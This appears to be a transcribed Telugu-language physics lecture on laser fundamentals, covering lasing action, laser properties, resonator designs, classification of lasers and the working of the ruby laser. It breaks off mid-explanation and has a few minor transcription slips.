పంపింగ్ మెకానిజంలో మనం హీట్ ఎనర్జీని ఉపయోగిస్తాము. హీట్ ఎనర్జీని ఉపయోగించడం వల్ల హై టెంపరేచర్స్ వస్తాయి. హై టెంపరేచర్స్ వల్ల ఈ హీట్ ఎనర్జీని పార్టికల్స్ అబ్జార్బ్ చేసుకుని హైయర్ ఎనర్జీ స్టేట్స్లోకి వెళ్తాయి. సో లాస్ట్ ప్రాసెస్ ఇన్ దిస్ లేజర్ ఫండమెంటల్స్ ఆర్ లేజింగ్ యాక్షన్. వాట్ ఈస్ meant by a లేజింగ్ యాక్షన్? ఈ పంపింగ్ వల్ల మనకి పాపులేషన్ ఇన్వర్షన్ అనేది అచీవ్ అవుతుంది. ఈ పాపులేషన్ ఇన్వర్షన్ అచీవ్ అవ్వడం వల్ల మనకి ఆటోమేటిక్గా స్పాంటేనియస్ ఎమిషన్ జరిగి ఒక పార్టికల్ దానంతట అది కిందకు వస్తుంది. కిందకు వచ్చినప్పుడు ఒక ఫోటాన్ రిలీజ్ అవుతుంది. ఈ ఫోటాన్ ఇంకొక పార్టికల్ని మెటాస్టేబుల్ స్టేట్లో ఉన్న ఇంకొక పార్టికల్ని స్టిమ్యులేట్ చేసి 2 ఫోటాన్స్ని ఎమిట్ చేస్తుంది. ఈ 2 ఫోటాన్స్ తర్వాత ఉన్న 2 మెటాస్టేబుల్ స్టేట్లో ఉన్న 2 పార్టికల్స్ మీద ఈ 2 ఫోటాన్స్ కొలైడ్ అయ్యి ఇంకొక 2 ఫోటాన్స్ని ఎమిట్ చేస్తాయి. ఫలితంగా మనకి ఈ ప్రాసెస్లో టోటల్ 4 ఫోటాన్స్ వస్తాయి. 2 ఫోటాన్స్ 2 పార్టికల్స్ మీద ఇన్సిడెంట్ అవ్వడం వల్ల ప్రతి ప్రాసెస్లో 2 ఫోటాన్స్ రావడం వల్ల 2 పార్టికల్స్ ఉన్నాయి కనుక 4 ఫోటాన్స్ ఎమిట్ అవుతాయి. ఈ ఫిగర్లో మనం క్లియర్గా మనం అబ్జర్వ్ చేయొచ్చు. ఇందులో రెడ్ కలర్లో ఉన్నవి ఎగ్జైటెడ్ యాటమ్స్. ఈ ఎగ్జైటెడ్ యాటమ్ మీద ఈ రెడ్ కలర్ యారో పడింది అంటే ఒక ఫోటాన్ ఇన్సిడెంట్ అయింది. ఈ ఫోటాన్ ఇన్సిడెంట్ అవ్వడం వల్ల ప్రతి కొలిజన్లో నుంచి కూడా మనకి 2 ఫోటాన్స్ వస్తున్నాయి. ఈ 2 ఫోటాన్స్ మిగతా యాటమ్స్ని స్టిమ్యులేట్ చేస్తున్నాయి. కనుక ఈ ప్రాసెస్ చైన్ రియాక్షన్. ఈ చైన్ రియాక్షన్ అలా కంటిన్యూ అవ్వడం వల్ల మనకి గ్రాడ్యువల్గా ఫోటాన్స్ నెంబర్ యొక్క పెరుగుతుంది. ఈ ఫోటాన్స్ నెంబర్ పెరగడం వల్ల అక్కడ లోపల ఉన్న ఫోటాన్ బీమ్ యొక్క ఎనర్జీ కూడా పెరుగుతుంది. ఎందుకంటే ఎనర్జీ ఈక్వల్స్ టు NH/nu. ఎప్పుడైతే N పెరిగిందో ఆటోమేటిక్గా E పెరుగుతుంది. ఎప్పుడైతే ఈ ఎనర్జీ లేదా ఇంటెన్సిటీ ఒక సఫిషియంట్ వాల్యూకి రీచ్ అయిన తర్వాత మనకి లేజర్ బీమ్ అనేది బయటికి ఎమిట్ అవుతుంది ఆ డివైస్ నుంచి. సో దిస్ ఈజ్ కాల్డ్ యాజ్ లేజింగ్ యాక్షన్. అయితే ఈ ఫిగర్లో మనం క్లియర్ కట్గా గమనించవచ్చు. సో ఫస్ట్ స్పాంటేనియస్ ఎమిషన్లో ఒక ఫోటాన్ ఎమిట్ అవుతుంది. ఈ ఫోటాను నెక్స్ట్ పార్టికల్ని స్టిమ్యులేట్ చేయడం వల్ల 2 ఫోటాన్స్ వస్తాయి. ఈ 2 ఫోటాన్స్ యొక్క నెంబర్ గ్రాడ్యువల్గా పెరుగుతూ ఆటోమేటిక్గా ఫోటాన్స్ నెంబర్ పెరగడం వల్ల హై ఎనర్జీ బీము ఈ సైడ్ నుంచి మనకి లేజర్ రూపంలో బయటకు వస్తుంది. ఇందులో కూడా మనం డిఫరెంట్ ఈ మొత్తం చదువుకున్న ప్రాసెస్లన్నీ చూడొచ్చు. సో దిస్ ఈజ్ ఎగ్జైటెడ్ స్టేట్స్ ఆఫ్ ద యాటమ్స్. ఈ ఎగ్జైటెడ్ స్టేట్స్లో నుంచి మనకి స్పాంటేనియస్ ఎమిషన్ వల్ల కొన్ని ఫోటాన్స్ వస్తాయి. ఈ స్పాంటేనియస్ ఎమిషన్ స్టిమ్యులేట్ ఎమిషన్ వల్ల మరికొన్ని ఫోటాన్స్ని ఎమిట్ చేస్తుంది. ఫైనల్గా ఈ ఫోటాన్స్ యొక్క నెంబర్ పెరగడం వల్ల లాస్ట్కి హై ఎనర్జీ ఫోటాన్ బీము ఈ రూపంలో మనకి బయటకు వస్తుంది. సో వాట్ ఆర్ ద ప్రాపర్టీస్ ఆఫ్ లేజర్? లేజర్కి డిఫరెంట్ ప్రాపర్టీస్ ఉన్నాయి. అందులో ఫస్ట్ ప్రాపర్టీ మోనోక్రోమిక్ ప్రాపర్టీ. మోనోక్రోమిక్ ప్రాపర్టీ ఏంటి? లేజర్కి సింగిల్ వేవ్ లెంత్ ఉంటుంది. రెండోది హైలీ కోహరెంట్, అంటే అందులో ఉన్న ఫోటాన్స్ అన్నీ కూడా ఒకే ఫేజ్లో ఉంటాయి.
అయితే ఇక్కడ ఈ ఫిగర్లో కానీ మనం అబ్జర్వ్ చేయగలిగితే ఫస్ట్ది సన్లైట్. సన్లైట్ అనేది మనకందరికీ తెలిసిందే, ఇట్ ఈజ్ ఏ క్రోమాటిక్ లైట్ ఆర్ మల్టీ కలర్డ్ లైట్. ఇందులో 7 కలర్స్ ఉంటాయి. కాబట్టి ఇది సింగిల్ వేవ్ లెంత్ కాదు. మనం ఏం చెప్తామంటే దానికి రేంజ్ చెప్తాం. 4000 యాంగ్స్ట్రామ్స్ నుంచి 7500 యాంగ్స్ట్రామ్స్ ఈ సన్లైట్కి ఉంటుంది. రెండో దానికి వచ్చేసరికి దిస్ ఈజ్ ద లైట్ ఎమిటెడ్ ఫ్రమ్ ద ఎల్ఈడి. ఇది మోనోక్రోమాటిక్ అయినప్పటికీ కూడా ఇందులో ఉన్న లైట్ వేవ్స్ అన్నిటికి కూడా ఫేజ్ అనేది ఈక్వల్గా ఉండదు. కాబట్టి ఫేజ్ ఈక్వల్గా ఉండదు కాబట్టి ఆ బీమ్ని మనం ఇన్కోహరెంట్ అంటాము. అయితే లాస్ట్ది దిస్ ఈజ్ ద లైట్ ఎమిటెడ్ ఫ్రమ్ ద లేజర్ బీమ్. ఈ లేజర్ బీమ్ నుంచి వస్తున్న లైట్కి సేమ్ వేవ్ లెంత్ ఉంటూ అదేవిధంగా అన్నీ కూడా సేమ్ ఫేజ్లో ఉండడం వల్ల ఇది మోనోక్రోమాటిక్ యాజ్ వెల్ యాజ్ హైలీ కోహరెంట్. అండ్ అనదర్ ఇంపార్టెంట్ ప్రాపర్టీ ఆఫ్ దిస్ లేజర్ బీమ్ ఈజ్ హై డైరెక్షనాలిటీ. అంటే దీనికి యాంగులర్ స్ప్రెడ్ అనేది చాలా తక్కువగా ఉంటుంది కనుక ఇది ఎంత దూరమైనా ఈజీగా ట్రావెల్ చేస్తుంది. అదేవిధంగా ఈ స్మాల్ ఏరియాలో హై ఎనర్జీని కూడా డిపాజిట్ చేస్తుంది, ఎందుకంటే దీని ఇంటెన్సిటీ ఎక్కువ. ఫర్ ఎగ్జాంపుల్ ఆర్డినరీ లైట్ సోర్స్ తీసుకుంటే ఈ ఆర్డినరీ లైట్ సోర్స్ నుంచి ఎమిట్ అవుతున్న లైట్ వేవ్స్కి యాంగులర్ స్ప్రెడ్ చాలా ఎక్కువగా ఉంటుంది. కాబట్టి ఇవి ఎక్కువ డిస్టెన్సెస్ ట్రావెల్ చేయలేవు ఈ లైట్ వేవ్స్. కానీ ఒక లేజర్ సోర్స్ నుంచి ఎమిట్ అవుతున్న లైట్ వేవ్స్కి యాంగులర్ స్ప్రెడ్ తక్కువగా ఉండడం వల్ల లేజర్ వేవ్స్ అనేవి చాలా ఎక్కువ దూరం ఎటువంటి నష్టం లేకుండా ప్రయాణించగలవు. దీన్నే మనం డైరెక్షనాలిటీ ప్రాపర్టీ కింద చెప్తాము. అయితే ఆర్డినరీ లైట్కి నెక్స్ట్ లేజర్ లైట్కి మధ్యన డిఫరెన్సెస్ మనం ఈ స్లైడ్లో క్లియర్గా మనం అబ్జర్వ్ చేయొచ్చు. ఆర్డినరీ లైట్లో మల్టీ కలర్స్ ఉంటే ఈ లేజర్ లైట్లో సింగిల్ కలర్డ్ ఉంటుంది. అదేవిధంగా ఆర్డినరీ లైట్లో డిఫరెంట్ డైరెక్షన్స్లో ట్రావెల్ చేస్తుంటే కానీ లేజర్ లైట్కి సింగిల్ డైరెక్షన్ ఉంటుంది. అదేవిధంగా ఆర్డినరీ లైట్లో ఇన్కోహరెంట్ బీమ్ అయితే ఇక్కడికి వచ్చేసరికి కోహరెన్స్. Okay, sir. Ready, sir. So next concept is different types of lasers. What are the different types of lasers which are studying? అయితే తెలుసుకునే ముందు మనకి లేజర్లో ఉన్న డిఫరెంట్ పార్ట్స్ ఏంటి, లేజర్లో ఖచ్చితంగా ఏ లేజర్లో తీసుకున్నా ఈ లేజర్లో 3 పార్ట్స్ ఉంటాయి. ఫస్ట్ వన్ యాక్టివ్ మీడియము, రెండోది ఎగ్జైటేషన్ మెకానిజం, మూడోది రెజొనేటర్. అయితే ఇందులో ఒక్కొక్క దాని గురించి మనం ఇండివిజువల్గా తెలుసుకుందాం. ఇందులో ఈ సెంటర్లో ఉన్నది యాక్టివ్ మీడియం. దాన్ని వాటిని పార్టికల్స్ని పంపింగ్ చేయడానికి ఈ ఎగ్జైటేషన్ మెకానిజం, అలాగే ఈ విధంగా మనకి హై ఇంటెన్సిటీ లేజర్ బీమ్ డెవలప్ అవ్వడానికి ఈ రెజొనేటర్స్ అనేవి వాడడం జరుగుతుంది. సో ఇందులో యాక్టివ్ మీడియం అంటే ఏంటి? యాక్టివ్ మీడియంలో మనకి పార్టికల్స్ ఉంటాయి. ఈ యాక్టివ్ మీడియంలో ఉన్న పార్టికల్స్ మనకి పంపింగ్ ప్రాసెస్లో ఎమిట్ అవుతున్న ఎనర్జీని అబ్జార్బ్ చేసుకొని ఎగ్జైట్ అయ్యి అవి మళ్ళీ స్టిమ్యులేటెడ్ ఎమిషన్స్కి లోన్ కావడం వల్ల మనకి ఫోటాన్స్ అనేవి ఎమిట్ అవ్వడం జరుగుతుంది. అయితే ఈ పార్టికల్స్ అనేవి ఏవైనా కావచ్చు. ఈ పార్టికల్స్ సాలిడ్స్ అవ్వచ్చు, లేదా లిక్విడ్స్ అవ్వచ్చు, లేదా గ్యాసెస్ అవ్వచ్చు, లేదా సెమీ కండక్టర్ మెటీరియల్ అయినా తీసుకోవచ్చు. నెక్స్ట్ వన్ ఆప్టికల్ పంపింగ్ మెకానిజం. ఎగ్జైటేషన్ మెకానిజంలో ఫస్ట్ వన్ అనేది మనకి ఆప్టికల్ పంపింగ్ మెకానిజం, రెండోది ఎలక్ట్రికల్ పంపింగ్ మెకానిజం, మూడోది కెమికల్ పంపింగ్ మెకానిజం, అండ్ ద లాస్ట్ వన్ ఈజ్ థర్మల్ ఆర్ హీట్ పంపింగ్ మెకానిజం. ఈ పంపింగ్ మెకానిజం వల్ల మనకి అబ్జార్బ్షన్ కావాల్సిన ఎనర్జీ అనేది మనకి లభ్యమవుతుంది. అండ్ ద లాస్ట్ వన్ ఈజ్ రెజొనేటర్. ఈ రెజొనేటర్ దేనికి ఉపయోగపడుతుంది? లేజింగ్ యాక్షన్ జరగడానికి ఈ రెజొనేటర్ అనేది మనకు ఉపయోగపడుతుంది. అయితే ఇందులో ఏం జరుగుతుంది? ఈ లేజింగ్ యాక్షన్ వల్ల హై ఎనర్జీ లేజర్ బీమ్ అనేది బయటకు వస్తుంది. అయితే ఈ అరేంజ్మెంట్లో ఏముంటాయి? 2 మిర్రర్స్ ఉంటాయి. ఒకటి పర్ఫెక్ట్లీ రిఫ్లెక్టింగ్ మిర్రరు, ఇంకొకటి పార్షియల్లీ రిఫ్లెక్టింగ్ మిర్రర్. సో ఈ పార్షియల్లీ రిఫ్లెక్టింగ్ మిర్రర్ నుంచి మనకి లేజర్ బీమ్ అనేది బయటికి రావడం జరుగుతుంది. లేజర్ బీమ్కి ఒక ఇంటెన్సిటీ రీచ్ అయిన తర్వాత అది ఈ పార్షియల్ రిఫ్లెక్టింగ్ మిర్రర్ నుంచి బయటికి ఎమిట్ అవుతుంది. సో ఇందులోకి వచ్చేసరికి డిఫరెంట్ టైప్స్ ఆఫ్ రెజొనేటర్స్ మనం ఈ స్లైడ్లో చూపిస్తున్నాం. ఇందులో ఫస్ట్ దాంట్లో 2 కూడా ప్లేన్ మిర్రర్స్ ఉన్నాయి. ఆ 2 ప్లేన్ మిర్రర్స్ మధ్య డిస్టెన్స్ సెల్, కాబట్టి ఇది ప్లేన్ ప్యారలల్ రెజొనేటర్. రెండో దాంట్లోకి వచ్చేసరికి ఈ 2 ప్లేన్ మిర్రర్స్ కాకుండా స్పెరికల్ మిర్రర్స్ వాడడం జరిగింది. వీటి యొక్క రేడియస్ ఆఫ్ కర్వేచర్ 2 ఈక్వల్గా ఉంటూ రెండిటి వాల్యూస్ ఆ డిస్టెన్స్ మధ్య ఆ రెండింటి మధ్య ఉన్న డిస్టెన్స్కి హాఫ్ ఉంటుంది, దట్ ఈస్ L/2.
సో ఇటువంటి దాన్ని మనం కాన్సెంట్రిక్ రెజొనేటర్ అంటాము. మూడో దానిలోకి వచ్చేసరికి ఒకదాని రేడియస్ ఆఫ్ కర్వేచర్ ఎల్ అయితే రెండో దానిది కూడా ఎల్ అవుతుంది. ఇటువంటి దాన్ని మనం కాన్ఫోకల్ రెజొనేటర్ అంటున్నాము. లాస్ట్ వన్ ఒక దాంట్లో ప్లేన్ మిర్రర్ వాడాము, ఇంకో దాంట్లో రేడియస్ ఆఫ్ కర్వేచర్ ఎల్ కలిగిన ఇంకొక మిర్రర్ వాడాము, దీన్ని హెమిస్పెరికల్ అంటున్నాము. లాస్ట్ వన్కి వచ్చేసరికి ఒకటి రేడియస్ ఆఫ్ కర్వేచర్ ఎల్ అయితే ఇంకొకటిది రేడియస్ ఆఫ్ కర్వేచర్ ఎల్ మైనస్ R1. సో ఈ రెండింటి మధ్య ఉన్న రెజొనేటర్ మనం కాన్వెక్స్ కాన్కేవ్ రెజొనేటర్ అంటున్నాము. సో ఇటువంటి రెజొనేటర్స్ ఏవైనా వాడుతూ మనం లేజర్ని అనేది తయారు చేయొచ్చు. సో ఇప్పుడు లేజర్లో డిఫరెంట్ టైప్స్ ఉన్నాయి. ఈ టైప్స్ని వేరియస్ ఫ్యాక్టర్స్ కింద మనం వాటిని డివైడ్ చేయొచ్చు. సో ఫస్ట్ వన్ ఏంటి, అందులో ఉన్న మీడియం ఏంటి, యాక్టివ్ మీడియం మీద ఆధారపడుతూ లేజర్స్ని డివైడ్ చేయొచ్చు. అలాగే అందులో వాడిన ఎగ్జైటేషన్ మెకానిజం మీద ఆధారపడుతూ లేజర్స్ని డివైడ్ చేయొచ్చు. అండ్ ద థర్డ్ వన్ అనేది వచ్చే అవుట్పుట్ మీద డిపెండ్ అవుతూ కూడా లేజర్స్ని డివైడ్ చేయొచ్చు. అదేవిధంగా అందులో వాడే లెవెల్ సిస్టమ్ మీద కూడా మనం వాడుతూ లేజర్స్ని డివైడ్ చేయొచ్చు. అండ్ ద లాస్ట్ వన్ వేవ్ లెంత్ మీద కూడా డిపెండ్ అవుతూ మనం లేజర్స్ని డివైడ్ చేయొచ్చు. అందులో ఫస్ట్ వన్ యాక్టివ్ మీడియం మీద ఆధారపడుతూ లేజర్స్ని ఎన్ని టైప్స్ కింద డివైడ్ చేయొచ్చు. యాక్టివ్ మీడియం కింద ఆధారపడుతూ లేజర్స్ని మనం డిఫరెంట్ టైప్స్ కింద చేయొచ్చు. అందులో ఫస్ట్ వన్ సాలిడ్ స్టేట్ లేజర్, అంటే అందులో వాడే సబ్స్టెన్సెస్ అన్నీ కూడా సాలిడ్ స్టేట్లో ఉంటాయి. ఎగ్జాంపుల్ రూబీ లేజర్. రెండోది లిక్విడ్ లేజర్స్, ఇందులో వాడే సబ్స్టెన్సెస్ లిక్విడ్ మెటీరియల్ కావడం వల్ల లిక్విడ్ లేజర్స్ అంటున్నాము. ఎగ్జాంపుల్ డై లేజర్. థర్డ్ వన్ గ్యాసెస్ సబ్స్టెన్సెస్ వాడితే వచ్చే లేజర్స్ని గ్యాస్ లేజర్స్ అంటున్నాము. ఎగ్జాంపుల్ హీలియం నియాన్ లేజర్. అండ్ ద లాస్ట్ వన్ ఈ సెమీ కండక్టర్ లేజర్. ఇందులో మనం సెమీ కండక్టర్ మెటీరియల్స్ వాడతాము. ఎగ్జాంపుల్ గ్యాలియం ఆర్సెనైడ్ లేజర్. అదేవిధంగా ఎగ్జైటేషన్ మెకానిజం మీద ఆధారపడుతూ లేజర్స్ని 4 క్లాసెస్ కింద డివైడ్ చేయొచ్చు. అందులో ఫస్ట్ వన్ ఆప్టికల్ ఎగ్జైటేషన్ మెకానిజం వాడడం వల్ల వచ్చే లేజరు, ఎగ్జాంపుల్ రుబీ లేజర్. రెండోది ఎలక్ట్రికల్ డిశ్చార్జ్ వాడడం వల్ల వచ్చే లేజరు, ఎగ్జాంపుల్ హీలియం నియాన్ లేజర్. మూడోది కెమికల్ రియాక్షన్స్ వల్ల వచ్చే లేజర్, ఎగ్జాంపుల్ కెమికల్ లేజర్. అండ్ ద లాస్ట్ వన్ థర్మల్ ఎగ్జైటేషన్ మెకానిజం వాడడం వల్ల వచ్చే లేజర్ని మనం థర్మల్ ఎగ్జైటేషన్ మెకానిజం ఎంప్లాయిడ్ లేజర్ అంటున్నాము. దీనికి ఎగ్జాంపుల్ CO2 లేజర్. అదేవిధంగా వచ్చే లేజర్ అవుట్పుట్ మీద డిపెండ్ అవుతూ లేజర్స్ని 2 క్లాసెస్ కింద డివైడ్ చేయొచ్చు. అవుట్పుట్ కనుక పల్సర్ రూపంలో ఉంటే, పల్సెస్ రూపంలో ఉంటే వచ్చే లేజరు పల్సర్ లేజర్, ఎగ్జాంపుల్ రుబీ లేజర్. అదేవిధంగా అవుట్పుట్ కంటిన్యూస్ వేవ్ రూపంలో వస్తే దాన్ని కంటిన్యూస్ లేజర్ కింద చెప్తాము. ఎగ్జాంపుల్ హీలియం నియాన్ లేజర్. నెక్స్ట్ అందులో మనకి లేజింగ్ యాక్షన్ అనేది ఏ లెవెల్స్ మధ్య జరుగుతుంది, అందులో ఎన్ని లెవెల్స్ ఎంప్లాయ్ అయ్యాయి, ఆ ఎనర్జీ లెవెల్స్ మీద డిపెండ్ అవుతూ లేజర్స్ని 3 టైప్స్ కింద డివైడ్ చేయొచ్చు. అందులో 2 లెవెల్స్ కనుక మనం వాడితే దాన్ని 2 లెవెల్ లేజర్ సిస్టమ్ అంటాము. దానికి ఎగ్జాంపుల్ మేజర్, అమోనియా మేజర్. అదేవిధంగా అందులో 3 లెవెల్స్ లేజర్ ఎనర్జీ లెవెల్స్ ఎంప్లాయ్ అయితే దానికి ఎగ్జాంపుల్ రుబీ లేజర్. అదేవిధంగా 4 లెవెల్ లేజర్స్ ఎంప్లాయ్ అయితే దాన్ని మనం 4 లెవెల్ లేజర్ కింద చెప్తాము. ఎగ్జాంపుల్ హీలియం నియాన్ లేజర్. బేసింగ్ అపాన్ వేవ్ లెంత్, బయటకు వచ్చే అవుట్పుట్ యొక్క వేవ్ లెంత్ ఏ వాల్యూ కలిగి ఉంది దాని మీద డిపెండ్ అవుతూ మనం లేజర్స్ని 6 క్లాసెస్ కింద డివైడ్ చేయొచ్చు. అందులో ఫస్ట్ వన్ విజిబుల్ రీజియన్లో ఉంటే విజిబుల్ రీజియన్ లేజర్స్ అంటాము. ఎగ్జాంపుల్ రుబీ లేజర్. అది కాకుండా ఐఆర్ రీజియన్లో ఉంటే ఐఆర్ రీజియన్ లేజర్స్ అంటాము. దానికి ఎగ్జాంపుల్ CO2 లేజర్. నెక్స్ట్ యూవీ రీజియన్లో ఉంటే దాన్ని మనం యూవీ రీజియన్ లేజర్స్ అంటాము. ఎగ్జాంపుల్ గ్యాలియం నైట్రైడ్ లేజర్. అదేవిధంగా మైక్రోవేవ్ రీజియన్లో ఉంటే మేజర్స్ అంటాము. దానికి ఎగ్జాంపుల్ అమోనియా మేజర్. అండ్ ఎక్స్రే రీజియన్లో ఉంటే వచ్చే లేజర్స్ మనకి హైలీ అయనైజ్డ్ ప్లాస్మా లేజర్స్. సో ఈ విధంగా మనం డిఫరెంట్ క్లాసెస్ కింద వేవ్ లెంత్ మీద డిపెండ్ అవుతూ డివైడ్ చేయొచ్చు. అందులో ఫస్ట్ వన్ మనకి సిలబస్లో 2 లేజర్స్ ఉన్నాయి. ఒకటి రుబీ లేజరు, ఇంకోటి హీలియం నియాన్ లేజర్. అందులో ఫస్ట్ వన్ మనం తీసుకుంటే రుబీ లేజర్. రుబీ లేజర్ అనేది ఇది సాలిడ్ స్టేట్ లేజర్. రెండోది ఇందులో వచ్చే అవుట్పుట్ పల్సర్ రూపంలో ఉంటుంది కాబట్టి ఇది పల్సర్ లేజర్. ఇందులో వాడే ఎగ్జైటేషన్ మెకానిజము ఆప్టికల్ ఎగ్జైటేషన్ మెకానిజం. అండ్ ఇందులో మనకి 3 లెవెల్స్ లేజర్స్ అనేవి ఉంటాయి కాబట్టి దీన్ని మనం 3 లెవెల్ లేజర్ కింద చెప్పొచ్చు. అదేవిధంగా అవుట్పుట్ విజిబుల్ రీజియన్లో ఉంటుంది కాబట్టి ఇది విజిబుల్ రీజియన్లో ఉన్న పనిచేసే లేజర్ కింద చెప్పుకోవచ్చు. అయితే రుబీ లేజర్లో ఉండే పార్ట్స్ ఏంటి? ఈ రుబీ లేజర్ని ఫస్ట్ తయారు చేసింది మైమన్ అనే సైంటిస్టు, అది 1960లో. అయితే ఇందులో ఇదే కలర్లో ఉంటుంది, ఇది పింక్ కలర్లో ఉంటుంది. వాట్ ఈస్ ద కెమికల్ నేమ్ ఆఫ్ దిస్ రుబీ లేజర్? దీని కెమికల్ నేము Al2O3 అల్యూమినియం ట్రయాక్సైడ్. కాకపోతే అందులో కొంత క్రోమియం ఆక్సైడ్ కూడా కలిసి ఉంటుంది. ఎంత పర్సెంటేజ్ కలిసి ఉంటుంది? 0.2 నుంచి 0.5% క్రోమియం ఆక్సైడ్ కలిసి ఉంటుంది.
ఈ క్రోమియం ఆక్సైడ్ వల్లే ఆ రూబీ లేజర్కి ఆ కలర్. సో క్రోమియం ఆక్సైడ్ యొక్క పర్సంటేజ్ పెరిగితే దాని కలర్ యొక్క ఇంటెన్సిటీ కూడా పెరుగుతుంది. అయితే ఇందులో యాక్టివ్ మెటీరియల్ ఏంటి? రెండు మెటీరియల్స్ ఉన్నాయి, ఒకటి క్రోమియం ఆక్సైడ్ ఉంది, అదేవిధంగా అల్యూమినియం ట్రయాక్సైడ్ ఉంది. కాకపోతే ఈ రెండిట్లో యాక్టివ్ మెటీరియల్ ఏంటంటే మనకి క్రోమియం అయాన్స్ అనేవి యాక్టివ్ మెటీరియల్ ఈ లేజర్లో. మరి అల్యూమినియము అదేవిధంగా ఆక్సిజన్ యాటమ్స్ అనేవి అవి యాక్టివ్గా ఉండవు, ఇన్యాక్టివ్గా ఉంటాయి, అంటే అవి ఇనర్ట్ మెటీరియల్స్. సో ఈ ఫిగర్లో మనం కానీ క్లియర్గా అబ్జర్వ్ చేస్తే దిస్ ఈజ్ ద రూబీ రాడ్ అండ్ దిస్ ఈజ్ ద ఆప్టికల్ పంపింగ్ మెకానిజం, అదేవిధంగా ఇది రెజొనేటర్. సో ఈ రూబీ లేజర్లో వాడే 3 పార్ట్స్ ఇక్కడ మనం క్లియర్గా ఈ ఫిగర్లో మనం అబ్జర్వ్ చేయొచ్చు. సో రూబీ క్రిస్టల్ ఏ రూపంలో తీసుకుంటాం? ఒక సిలిండ్రికల్ రాడ్ రూపంలో తీసుకుంటాం. దాని లెంత్ ఎంత? 4 సెంటీమీటర్స్ లెంత్, అదేవిధంగా డయామీటర్ 0.5 సెంటీమీటర్స్. నెక్స్ట్ ఈ రూబీ రాడ్ యొక్క 2 ఎండ్స్ కూడా మనం పర్ఫెక్ట్గా ప్యారలల్గా ఉండే విధంగా మనం వాటిని అరేంజ్ చేయడం జరుగుతుంది. అదేవిధంగా వాటిని హైలీ పాలిష్డ్ చేస్తాం. హైలీ పాలిష్డ్ చేసిన తర్వాత ఆ 2 ఎండ్స్ని కూడా మనం సిల్వర్ కలర్ అనేది వేయడం జరుగుతుంది. వేయడం వల్ల ఏమవుతుందంటే ఒక సైడ్ ఫుల్లీ రిఫ్లెక్టింగ్ అవుతుంది, అదర్ సైడ్ అనేది పార్షల్ రిఫ్లెక్టింగ్ అయ్యే విధంగా వాటిని మనం సిల్వర్గా ఉండే విధంగా తయారు చేస్తాం. అయితే ఈ రూబీ లేజర్ చుట్టూ హెలికాన్ జీనాన్ ఫ్లాష్ ల్యాంప్ అనేది అరేంజ్ చేయడం జరుగుతుంది. ఈ జీనాన్ ఫ్లాష్ ల్యాంప్ అనేది మనకి పంపింగ్ సోర్స్ కింద మనం అబ్జర్వ్ చేయొచ్చు. సో ఈ ఫిగర్లో మనకి క్లియర్గా ఇందులో వాడే పార్ట్స్ అన్ని కనబడుతున్నాయి. ఇది పవర్ సప్లై విచ్ ఈజ్ కనెక్టెడ్ టు ద హెలికల్ జీనాన్ ఫ్లాష్ ల్యాంప్. అదేవిధంగా సెంటర్లో ఉన్న పింక్ కలర్ది రూబీ రాడు. నెక్స్ట్ ఈ ఎండ్స్ కూడా 2 ఎండ్స్ కూడా ఒకటి పార్షియల్లీ రిఫ్లెక్టింగ్, ఈ చివరి ఎండ్ పర్ఫెక్ట్లీ రిఫ్లెక్టింగ్ ప్లేట్. ఈ మొత్తం డివైస్ అంతా కూడా ఒక స్టీల్ ఒక మెటల్ కంటైనర్లో మనం దీన్ని ప్రొటెక్ట్ చేయడం జరుగుతుంది. నెక్స్ట్ హౌ దిస్ రూబీ లేజర్ ఈజ్ వర్కింగ్. ఎప్పుడైతే జీనాన్ ఫ్లాష్ ల్యాంప్ ఆన్ అయిందో దాని నుంచి వస్తున్న ఎనర్జీని ఈ క్రోమియం అయాన్స్ అబ్జార్బ్ చేసుకుని ఎగ్జైటెడ్ స్టేట్స్లోకి వెళ్తాయి. సో క్రోమియం అయాన్స్ యొక్క గ్రౌండ్ స్టేట్ ఈవెన్ స్టేట్ అయితే ఈ హెలికల్ జీనాన్ ల్యాంప్ నుంచి వస్తున్న ఎనర్జీని అబ్జార్బ్ చేసుకుని హయ్యర్ ఎనర్జీ స్టేట్స్ అయినటువంటి ఈ స్టేట్స్కి వెళ్ళడం జరుగుతుంది ఎలక్ట్రాన్. సో అక్కడికి వెళ్ళిన ఎలక్ట్రాను తిరిగి కొంత సమయం తర్వాత అంటే ఆఫ్టర్ ఇట్స్ లైఫ్ టైమ్ దే విల్ బీ రిలీజింగ్ ద ఎనర్జీ అండ్ దే విల్ బీ కమింగ్ టు ద స్టేట్ E2. E2 స్టేట్ అనేది దానికి మెటాస్టేబుల్ స్టేట్, ఎందుకంటే అక్కడ లైఫ్ టైం చాలా ఎక్కువగా ఉంటుంది కాబట్టి అక్కడికి వెళ్ళిన ఎలక్ట్రాన్స్ వాటంతట అవి కిందికి రావు. సో పంపింగ్ ప్రాసెస్ జరుగుతున్నంతసేపు ఈ హయ్యర్ ఎనర్జీ స్టేట్స్కి వెళ్ళిన ఎలక్ట్రాన్స్ ఎనర్జీని లాస్ అవుతూ మళ్ళీ E2 స్టేట్కి వస్తున్నాయి. E2 స్టేట్ నుంచి ఏ ఎలక్ట్రాన్ కూడా కిందికి రాదు. ఈ క్రోమియం అయాన్ అనేది కిందికి రాదు. క్రోమియం అయాన్ కిందికి రాకపోవడం వల్ల ఏమవుతుందంటే ఇక్కడ నెంబర్ అనేది పెరుగుతుంది. నెంబర్ పెరగడం వల్ల పాపులేషన్ అనేది ఇన్వర్షన్ అనేది అచీవ్ అవ్వడం జరుగుతుంది. సో పాపులేషన్ ఇన్వర్షన్ అచీవ్ అయిన తర్వాత ఇక్కడ పార్టికల్స్ యొక్క నెంబర్ పెరగడం వల్ల ఏదో ఒక పార్టికల్ క్రోమియం పార్టికల్ ఎనర్జీని లాస్ అవుతూ కిందికి రావడానికి మనకి మ్యాక్సిమం ప్రాబబిలిటీ ఉంటుంది. ఆ ప్రాబబిలిటీ వల్ల ఒక స్పాంటేనియస్ ఎమిషన్ జరిగి ఈ మెటాస్టేబుల్ స్టేట్లో ఉన్న ఒక క్రోమియం అయాను ఒక ఫోటాన్ని ఎమిట్ చేస్తూ ఈ లోవర్ ఎనర్జీ స్టేట్కి వస్తుంది. ఈ స్పాంటేనియస్ ఎమిషన్లో ఒక ఫోటాన్ అనేది ఎమిట్ అవుతుంది. ఈ స్పాంటేనియస్ ఎమిషన్లో రిలీజ్ అయిన ఫోటాను మెటాస్టేబుల్ స్టేట్లో ఉన్న మిగతా క్రోమియం అయాన్స్తో కొలిజన్స్ జరిపి అక్కడున్న ఈ క్రోమియం అయాన్స్ అన్నింటినీ కూడా గ్రౌండ్ స్టేట్కి స్టిమ్యులేటెడ్ 